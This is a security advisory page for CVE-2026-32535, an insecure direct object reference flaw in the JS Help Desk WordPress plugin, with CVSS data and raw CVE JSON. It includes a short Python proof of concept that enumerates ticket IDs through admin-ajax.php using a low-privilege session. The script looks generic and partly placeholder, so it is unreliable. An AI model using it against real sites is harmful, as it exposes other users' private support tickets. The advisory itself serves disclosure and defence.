Security Vulnerability Report
中文
CVE-2026-32535 CVSS 6.5 MEDIUM

CVE-2026-32535

Published: 2026-03-25 17:17:07
Last Modified: 2026-04-29 10:17:21

Description

Authorization Bypass Through User-Controlled Key vulnerability in JoomSky JS Help Desk js-support-ticket allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects JS Help Desk: from n/a through <= 3.0.3.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

JoomSky JS Help Desk <= 3.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # PoC for CVE-2026-32535: Authorization Bypass via User-Controlled Key # Target: JoomSky JS Help Desk <= 3.0.3 target_url = "http://example.com/wp-admin/admin-ajax.php" attacker_cookies = { "wordpress_logged_in_...": "low_privilege_session_token" } # The vulnerability allows accessing tickets by modifying the 'ticket_id' or similar user-controlled key # without verifying the user's ownership of the ticket. payload = { "action": "jss_support_ticket_get_details", "ticket_id": "1", # Try enumerating IDs (IDOR) "security": "nonce_if_needed" } try: response = requests.post(target_url, data=payload, cookies=attacker_cookies) if response.status_code == 200 and "sensitive_ticket_data" in response.text: print("[+] Vulnerability Exploited Successfully!") print("[+] Leaked Data:", response.text) else: print("[-] Exploit failed or patch applied.") except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32535", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:17:07.160", "lastModified": "2026-04-29T10:17:21.127", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authorization Bypass Through User-Controlled Key vulnerability in JoomSky JS Help Desk js-support-ticket allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects JS Help Desk: from n/a through <= 3.0.3."}, {"lang": "es", "value": "Vulnerabilidad de elusión de autorización a través de clave controlada por el usuario en JoomSky JS Help Desk js-support-ticket permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a JS Help Desk: desde n/a hasta &lt;= 3.0.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/js-support-ticket/vulnerability/wordpress-js-help-desk-plugin-3-0-3-insecure-direct-object-references-idor-vulnerability?_s_id=cve", "source": "[email protected]"}]}}